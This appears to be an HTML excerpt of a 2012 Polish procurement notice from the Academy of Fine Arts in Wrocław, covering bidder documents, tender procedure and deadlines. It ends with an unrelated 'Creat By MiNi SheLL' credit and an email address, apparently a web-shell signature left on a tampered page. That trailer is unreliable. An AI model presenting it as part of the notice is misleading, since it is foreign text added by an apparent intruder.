<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty (załącznik nr 1 do SIWZ).
2)	Formularz asortymentowo-cenowy (załącznik nr 2 do SIWZ).
3)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
4)	Dokument, z którego wynika upoważnienie Wykonawcy do podpisywania oferty lub pełnomocnictwo do reprezentowania Wykonawcy jeżeli ofertę składa pełnomocnik, a prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych.
5)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów). Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław
pokój 217 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2012 godzina 10:00, miejsce: Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław
sekretariat Kanclerza (pok. 107, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com